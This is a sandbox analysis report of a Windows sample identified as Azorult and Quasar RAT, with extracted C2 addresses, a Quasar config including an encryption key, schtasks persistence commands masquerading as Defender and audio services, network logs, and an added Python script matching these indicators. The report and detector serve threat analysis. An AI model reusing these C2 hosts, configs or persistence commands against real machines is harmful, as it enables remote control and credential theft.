Analysis

  • max time kernel
    6s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10-01-2025 23:33

General

  • Target: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
  • Size: 2.0MB
  • MD5: b342fc1721147d746388d4bf6c987a04
  • SHA1: bcb7f37269b927d2607578804be99ce1eb85f72a
  • SHA256: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28
  • SHA512: 2f64b632fa7b9c11f0cad0920ae348f5967535f91a449b2619641c227ca1e89ed9391c80dd3fe4285ff50978f62b573e1824312fdc3daf53ad20c61b1840dca5
  • SSDEEP: 24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKY4:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Ya

Malware Config

Extracted

  • Family: azorult
  • C2: http://0x21.in:8000/_az/

Extracted

  • Family: quasar
  • Version: 1.3.0.0
  • Botnet: EbayProfiles
  • C2:
    5.8.88.191:443
    sockartek.icu:443
  • Mutex: QSR_MUTEX_0kBRNrRz5TDLEQouI0
  • Attributes
    • encryption_key: MWhG6wsClMX8aJM2CVXT
    • install_name: winsock.exe
    • log_directory: Logs
    • reconnect_delay: 3000
    • startup_key: win defender run
    • subdirectory: SubDir

Signatures

  • Azorult
    An information stealer that was first discovered in 2016, targeting browsing history and passwords.
  • Azorult family
  • Quasar RAT (3 IoCs)
    Quasar is an open source Remote Access Tool.
  • Quasar family
  • Quasar payload (3 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)
    Looks up the country code configured in the registry, likely a geofence.
  • Executes dropped EXE (3 IoCs)
  • Enumerates connected drives (3 TTPs, 23 IoCs)
    Attempts to read the root path of hard drives other than the default C: drive.
  • Looks up external IP address via web service (2 IoCs)
    Uses a legitimate IP lookup service to find the infected system's external IP.
  • AutoIT Executable (1 IoC)
    AutoIT scripts compiled to PE executables.
  • Suspicious use of SetThreadContext (1 IoC)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  • Program crash (4 IoCs)
  • System Location Discovery: System Language Discovery (1 TTP, 8 IoCs)
    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  • System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
    Adversaries may check for Internet connectivity on compromised systems.
  • Runs ping.exe (1 TTP, 2 IoCs)
  • Scheduled Task/Job: Scheduled Task (1 TTP, 5 IoCs)
    Schtasks is often used by malware for persistence or to perform post-infection execution.
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoC)
  • Suspicious use of WriteProcessMemory (26 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    "C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"
    • Quasar RAT
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4864
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        PID:3964
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 548
        • Program crash
        PID:4844
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3952
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4048
      • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:116
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JyfJAnc31als.bat" "
          PID:1948
          • C:\Windows\SysWOW64\chcp.com
            chcp 65001
            PID:2488
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 10 localhost
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2320
          • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
            "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
            PID:4636
            • C:\Windows\SysWOW64\schtasks.exe
              "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
              • Scheduled Task/Job: Scheduled Task
              PID:4292
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4nTpIhOebLIU.bat" "
              PID:4356
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                PID:3032
              • C:\Windows\SysWOW64\PING.EXE
                ping -n 10 localhost
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:1584
              • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                PID:2172
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 2244
              • Program crash
              PID:3196
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 2276
          • Program crash
          PID:1732
    • C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
      "C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"
      • System Location Discovery: System Language Discovery
      PID:3800
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:1428
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4864 -ip 4864
    PID:824
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2868 -ip 2868
    PID:4616
  • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
    C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
    PID:4452
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      PID:1064
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        PID:4196
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 520
        • Program crash
        PID:1104
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      PID:4612
    • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
      "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"
      PID:1896
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
      • Scheduled Task/Job: Scheduled Task
      PID:2204
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1064 -ip 1064
    PID:4936
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4636 -ip 4636
    PID:3908

                                  Network

                                  • flag-us
                                    DNS
                                    0x21.in
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    0x21.in
                                    IN A
                                    Response
                                    0x21.in
                                    IN A
                                    44.221.84.105
                                  • flag-us
                                    POST
                                    http://0x21.in:8000/_az/
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    Remote address:
                                    44.221.84.105:8000
                                    Request
                                    POST /_az/ HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Host: 0x21.in:8000
                                    Content-Length: 99
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Fri, 10 Jan 2025 23:33:05 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: btst=9268163b13c12137f5295a7a3a498b33|181.215.176.83|1736551985|1736551985|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  • flag-us
                                    DNS
                                    0x21.in
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    0x21.in
                                    IN A
                                    Response
                                    0x21.in
                                    IN A
                                    44.221.84.105
                                  • flag-us
                                    POST
                                    http://0x21.in/_az/
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    Remote address:
                                    44.221.84.105:8000
                                    Request
                                    POST /_az/ HTTP/1.0
                                    Host: 0x21.in
                                    Connection: close
                                    User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Content-Length: 99
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Fri, 10 Jan 2025 23:33:06 GMT
                                    Content-Type: text/html
                                    Connection: close
                                    Set-Cookie: btst=b48f76c1694448dbf26c381bee22c954|181.215.176.83|1736551986|1736551986|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    winsock.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
                                    Response
                                    ip-api.com
                                    IN A
                                    208.95.112.1
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/
                                    windef.exe
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/ HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Fri, 10 Jan 2025 23:33:06 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 291
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                  • flag-us
                                    DNS
                                    105.84.221.44.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    105.84.221.44.in-addr.arpa
                                    IN PTR
                                    Response
                                    105.84.221.44.in-addr.arpa
                                    IN PTR
                                    ec2-44-221-84-105 compute-1 amazonawscom
                                  • flag-us
                                    DNS
                                    1.112.95.208.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    1.112.95.208.in-addr.arpa
                                    IN PTR
                                    Response
                                    1.112.95.208.in-addr.arpa
                                    IN PTR
                                    ip-apicom
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/
                                    winsock.exe
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/ HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Fri, 10 Jan 2025 23:33:07 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 291
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 58
                                    X-Rl: 43
                                  • flag-us
                                    DNS
                                    217.106.137.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    217.106.137.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    249.197.17.2.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    249.197.17.2.in-addr.arpa
                                    IN PTR
                                    Response
                                    249.197.17.2.in-addr.arpa
                                    IN PTR
                                    a2-17-197-249deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    14.160.190.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    14.160.190.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    95.221.229.192.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    95.221.229.192.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    154.239.44.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    154.239.44.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    133.211.185.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    133.211.185.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    sockartek.icu
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    sockartek.icu
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    sockartek.icu
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    sockartek.icu
                                    IN A
                                  • flag-us
                                    DNS
                                    50.23.12.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    50.23.12.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    15.164.165.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    15.164.165.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    134.130.81.91.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    134.130.81.91.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/ HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Fri, 10 Jan 2025 23:33:45 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 291
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                  • flag-us
                                    POST
                                    http://0x21.in:8000/_az/
                                    Remote address:
                                    44.221.84.105:8000
                                    Request
                                    POST /_az/ HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Host: 0x21.in:8000
                                    Content-Length: 99
                                    Cache-Control: no-cache
                                    Cookie: snkz=181.215.176.83; btst=9268163b13c12137f5295a7a3a498b33|181.215.176.83|1736551985|1736551985|0|1|0
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Fri, 10 Jan 2025 23:34:04 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: btst=9268163b13c12137f5295a7a3a498b33|181.215.176.83|1736552044|1736551985|29|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  • flag-us
                                    POST
                                    http://0x21.in/_az/
                                    Remote address:
                                    44.221.84.105:8000
                                    Request
                                    POST /_az/ HTTP/1.0
                                    Host: 0x21.in
                                    Connection: close
                                    User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Content-Length: 99
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Fri, 10 Jan 2025 23:34:20 GMT
                                    Content-Type: text/html
                                    Connection: close
                                    Set-Cookie: btst=61f07477a921d9fa17a24c2fbdba4544|181.215.176.83|1736552060|1736552060|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  • flag-us
                                    DNS
                                    sockartek.icu
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    sockartek.icu
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    winsock.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
                                    Response
                                    ip-api.com
                                    IN A
                                    208.95.112.1
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    winsock.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    winsock.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
Network flows (as laid out in the report: remote address, URL or domain, protocol, process, then bytes and packets sent and received; flows with no process listed were not attributed by the sandbox):

• 44.221.84.105:8000  http://0x21.in:8000/_az/  http  498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    sent 528 B / 6 packets, received 870 B / 5 packets
    HTTP request: POST http://0x21.in:8000/_az/  ->  HTTP response: 200
• 44.221.84.105:8000  http://0x21.in/_az/  http  498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    sent 471 B / 5 packets, received 590 B / 5 packets
    HTTP request: POST http://0x21.in/_az/  ->  HTTP response: 200
• 208.95.112.1:80  http://ip-api.com/json/  http  windef.exe
    sent 374 B / 5 packets, received 560 B / 2 packets
    HTTP request: GET http://ip-api.com/json/  ->  HTTP response: 200
• 208.95.112.1:80  http://ip-api.com/json/  http  winsock.exe
    sent 374 B / 5 packets, received 560 B / 2 packets
    HTTP request: GET http://ip-api.com/json/  ->  HTTP response: 200
• 5.8.88.191:443  (no URL, protocol not identified)  winsock.exe
    sent 260 B / 5 packets, no received bytes or packets recorded
• 208.95.112.1:80  http://ip-api.com/json/  http  (process not listed)
    sent 374 B / 5 packets, received 560 B / 2 packets
    HTTP request: GET http://ip-api.com/json/  ->  HTTP response: 200
• 5.8.88.191:443  (no URL, protocol not identified)  (process not listed)
    sent 260 B / 5 packets, no received bytes or packets recorded
• 44.221.84.105:8000  http://0x21.in:8000/_az/  http  (process not listed)
    sent 979 B / 13 packets, received 2.7kB / 9 packets
    HTTP request: POST http://0x21.in:8000/_az/  ->  HTTP response: 200
• 44.221.84.105:8000  http://0x21.in/_az/  http  (process not listed)
    sent 817 B / 12 packets, received 590 B / 5 packets
    HTTP request: POST http://0x21.in/_az/  ->  HTTP response: 200
• 208.95.112.1:80  ip-api.com  (protocol not identified)  (process not listed)
    sent 208 B / 4 packets, no received bytes or packets recorded
DNS lookups (all sent to 8.8.8.8:53; same column layout; the decoded address is given for each in-addr.arpa reverse lookup):

• 0x21.in  dns  498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    sent 53 B / 1 packet, received 69 B / 1 packet
    DNS request: 0x21.in  ->  DNS response: 44.221.84.105
• 0x21.in  dns  498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    sent 53 B / 1 packet, received 69 B / 1 packet
    DNS request: 0x21.in  ->  DNS response: 44.221.84.105
• ip-api.com  dns  winsock.exe
    sent 56 B / 1 packet, received 72 B / 1 packet
    DNS request: ip-api.com  ->  DNS response: 208.95.112.1
• 105.84.221.44.in-addr.arpa  dns  (process not listed)
    sent 72 B / 1 packet, received 127 B / 1 packet
    DNS request: 105.84.221.44.in-addr.arpa (PTR for 44.221.84.105, the 0x21.in address); no answer listed
• 1.112.95.208.in-addr.arpa  dns  (process not listed)
    sent 71 B / 1 packet, received 95 B / 1 packet
    DNS request: 1.112.95.208.in-addr.arpa (PTR for 208.95.112.1, the ip-api.com address); no answer listed
• 217.106.137.52.in-addr.arpa  dns  (process not listed)
    sent 73 B / 1 packet, received 147 B / 1 packet
    DNS request: 217.106.137.52.in-addr.arpa (PTR for 52.137.106.217); no answer listed
• 249.197.17.2.in-addr.arpa  dns  (process not listed)
    sent 71 B / 1 packet, received 135 B / 1 packet
    DNS request: 249.197.17.2.in-addr.arpa (PTR for 2.17.197.249); no answer listed
• 14.160.190.20.in-addr.arpa  dns  (process not listed)
    sent 72 B / 1 packet, received 158 B / 1 packet
    DNS request: 14.160.190.20.in-addr.arpa (PTR for 20.190.160.14); no answer listed
• 95.221.229.192.in-addr.arpa  dns  (process not listed)
    sent 73 B / 1 packet, received 144 B / 1 packet
    DNS request: 95.221.229.192.in-addr.arpa (PTR for 192.229.221.95); no answer listed
• 154.239.44.20.in-addr.arpa  dns  (process not listed)
    sent 72 B / 1 packet, received 158 B / 1 packet
    DNS request: 154.239.44.20.in-addr.arpa (PTR for 20.44.239.154); no answer listed
• 133.211.185.52.in-addr.arpa  dns  (process not listed)
    sent 73 B / 1 packet, received 147 B / 1 packet
    DNS request: 133.211.185.52.in-addr.arpa (PTR for 52.185.211.133); no answer listed
• sockartek.icu  dns  (process not listed)
    sent 118 B / 2 packets, received 124 B / 1 packet
    DNS request: sockartek.icu (two requests); no answer listed
• 50.23.12.20.in-addr.arpa  dns  (process not listed)
    sent 70 B / 1 packet, received 156 B / 1 packet
    DNS request: 50.23.12.20.in-addr.arpa (PTR for 20.12.23.50); no answer listed
• 15.164.165.52.in-addr.arpa  dns  (process not listed)
    sent 72 B / 1 packet, received 146 B / 1 packet
    DNS request: 15.164.165.52.in-addr.arpa (PTR for 52.165.164.15); no answer listed
• 134.130.81.91.in-addr.arpa  dns  (process not listed)
    sent 72 B / 1 packet, received 147 B / 1 packet
    DNS request: 134.130.81.91.in-addr.arpa (PTR for 91.81.130.134); no answer listed
• sockartek.icu  dns  (process not listed)
    sent 59 B / 1 packet, received 124 B / 1 packet
    DNS request: sockartek.icu; no answer listed
• ip-api.com  dns  winsock.exe
    sent 168 B / 3 packets, received 72 B / 1 packet
    DNS request: ip-api.com (three requests)  ->  DNS response: 208.95.112.1
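The flows and lookups above are a ready-made indicator set: the sample POSTs to the /_az/ gate on 44.221.84.105:8000 (and again on port 80) and gets 200 back, winsock.exe sends 260 B to 5.8.88.191:443 and receives nothing, sockartek.icu is queried without an answer, and both winsock.exe and windef.exe fetch http://ip-api.com/json/ to learn the victim's external address. The sandbox's reverse lookups (x.x.x.x.in-addr.arpa) expose the same addresses a second time in DNS logs. The script below is an added example, not part of the sandbox report: it matches those indicators against a small constructed log (tab-separated process, protocol, remote address, detail; the "unattributed" and "explorer.exe" lines and the example.com request are made up for contrast), and it decodes PTR names back to dotted IPs so a reverse lookup of a C2 address is caught as well as a forward one.

```python
"""Match the report's network indicators against constructed log lines.

Added example, not part of the sandbox report. Hosts, IPs, the /_az/ path and
ip-api.com are copied from the report's tables; the log format is constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Indicators copied from the report's network table.
C2_HOSTS = {"0x21.in", "sockartek.icu"}
C2_IPS = {"44.221.84.105", "5.8.88.191"}
C2_PATHS = {"/_az/"}              # gate path of the POSTs to 0x21.in
IP_LOOKUP_HOSTS = {"ip-api.com"}  # legitimate geolocation service used by the sample

PTR_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa\.?$", re.I)
HTTP_RE = re.compile(r"(\w+)\s+https?://([^/:\s]+)(?::\d+)?(/\S*)?", re.I)


def ptr_to_ip(name: str) -> Optional[str]:
    """'105.84.221.44.in-addr.arpa' -> '44.221.84.105'; None if not a valid PTR name."""
    m = PTR_RE.match(name.strip())
    if not m:
        return None
    octets = m.groups()[::-1]          # PTR names carry the octets reversed
    if any(int(o) > 255 for o in octets):
        return None
    return ".".join(octets)


@dataclass
class Record:
    process: str   # image name, or "unattributed" when the log has none
    proto: str     # "dns", "http" or "tcp"
    remote: str    # ip:port
    detail: str    # DNS query name, or "METHOD URL" for http; empty for raw tcp


def parse_line(line: str) -> Optional[Record]:
    """Constructed format: process<TAB>proto<TAB>ip:port<TAB>detail. Bad lines -> None."""
    parts = line.rstrip("\r\n").split("\t")
    if len(parts) != 4 or not parts[2]:
        return None
    return Record(*parts)


def classify(rec: Record) -> list[str]:
    """Return the indicator hits for one record (empty list when clean)."""
    ip = rec.remote.rsplit(":", 1)[0]
    hits: list[str] = []
    if ip in C2_IPS:
        hits.append(f"c2_ip:{ip}")
    if rec.proto == "http":
        m = HTTP_RE.match(rec.detail)
        if m:
            method, host, path = m.group(1).upper(), m.group(2).lower(), m.group(3) or "/"
            if host in C2_HOSTS or path in C2_PATHS:
                hits.append(f"c2_http:{method} {host}{path}")
            if host in IP_LOOKUP_HOSTS:
                hits.append(f"external_ip_lookup:{rec.process}")
    elif rec.proto == "dns":
        name = rec.detail.strip().lower().rstrip(".")
        if name in C2_HOSTS:
            hits.append(f"c2_dns:{name}")
        if name in IP_LOOKUP_HOSTS:
            hits.append(f"external_ip_lookup_dns:{rec.process}")
        if ptr_to_ip(name) in C2_IPS:     # reverse lookup of a C2 address
            hits.append(f"ptr_of_c2:{ptr_to_ip(name)}")
    return hits


def scan(lines: Iterable[str]) -> dict[str, list[str]]:
    """Group unique hits by process; unparseable lines are skipped."""
    found: dict[str, set[str]] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            found.setdefault(rec.process, set()).update(hits)
    return {proc: sorted(h) for proc, h in found.items()}


# Constructed sample modelled on the report's flows. The "unattributed" and
# "explorer.exe" lines and the example.com request are made up for contrast.
LOG = """\
498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe\tdns\t8.8.8.8:53\t0x21.in
498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe\thttp\t44.221.84.105:8000\tPOST http://0x21.in:8000/_az/
windef.exe\thttp\t208.95.112.1:80\tGET http://ip-api.com/json/
winsock.exe\tdns\t8.8.8.8:53\tsockartek.icu
winsock.exe\ttcp\t5.8.88.191:443\t
unattributed\tdns\t8.8.8.8:53\t105.84.221.44.in-addr.arpa
unattributed\tdns\t8.8.8.8:53\t14.160.190.20.in-addr.arpa
explorer.exe\thttp\t93.184.216.34:80\tGET http://example.com/
"""

if __name__ == "__main__":
    for proc, hits in scan(LOG.splitlines()).items():
        print(f"{proc}: {', '.join(hits)}")
```

Running it groups hits per process, so the 0x21.in lookup and the two POSTs fall under the dropper image, the dead 5.8.88.191:443 connection and the sockartek.icu query under winsock.exe, and the external IP lookup under windef.exe; the reverse lookup of 44.221.84.105 is flagged even though no process owns it. Feeding real proxy or DNS logs only requires replacing parse_line with a parser for that format.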

MITRE ATT&CK Enterprise v15

Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log  (1KB)
    MD5     10eab9c2684febb5327b6976f2047587
    SHA1    a12ed54146a7f5c4c580416aecb899549712449e
    SHA256  f49dbd55029bfbc15134f7c6a4f967d6c39142c63f2e8f1f8c78fab108a2c928
